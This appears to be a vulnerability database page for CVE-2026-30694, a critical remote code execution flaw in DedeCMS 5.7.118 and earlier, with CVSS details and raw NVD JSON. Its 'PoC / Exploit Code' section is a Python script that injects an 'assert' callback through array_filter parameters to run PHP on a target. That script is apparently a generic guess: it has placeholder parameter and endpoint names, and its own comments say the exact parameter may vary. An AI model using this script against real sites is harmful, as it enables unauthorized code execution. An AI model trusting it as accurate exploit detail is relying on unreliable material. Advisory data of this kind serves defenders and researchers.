Security Vulnerability Report
中文
CVE-2026-30694 CVSS 9.8 CRITICAL

CVE-2026-30694

Published: 2026-03-19 18:16:22
Last Modified: 2026-03-25 21:11:33

Description

An issue in DedeCMS v.5.7.118 and before allows a remote attacker to execute arbitrary code via the array_filter component

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* - VULNERABLE
DedeCMS <= 5.7.118

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_url): """ Proof of Concept for CVE-2026-30694 Demonstrates RCE via array_filter callback injection. """ # Payload targeting the vulnerable component # The exact parameter name might vary based on the specific vulnerable endpoint payload = { # Injecting the callback function name (e.g., 'assert') "_FILTER[0]": "assert", # Injecting the argument to the callback (PHP code to execute) "_FILTER[1]": "phpinfo();", # Additional parameters required to reach the vulnerable code path "action": "vulnerable_action" } try: response = requests.post(target_url, data=payload) if "phpinfo" in response.text: print("[+] Exploit successful! Code execution detected.") else: print("[-] Exploit failed or target not vulnerable.") except Exception as e: print(f"[!] Error: {e}") # Usage example # exploit("http://target-url/vulnerable_endpoint.php")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30694", "sourceIdentifier": "[email protected]", "published": "2026-03-19T18:16:22.400", "lastModified": "2026-03-25T21:11:32.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in DedeCMS v.5.7.118 and before allows a remote attacker to execute arbitrary code via the array_filter component"}, {"lang": "es", "value": "Un problema en DedeCMS v.5.7.118 y anteriores permite a un atacante remoto ejecutar código arbitrario a través del componente array_filter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.7.118", "matchCriteriaId": "EDD6243A-0F88-4E95-87BD-D3A72938D6BF"}]}]}], "references": [{"url": "https://jacobjacobjacob.gitbook.io/cve-2026-30694/", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://leixyous-personal-organization.gitbook.io/dedecms-file-manage-getshell-via-bypass-blacklist/", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}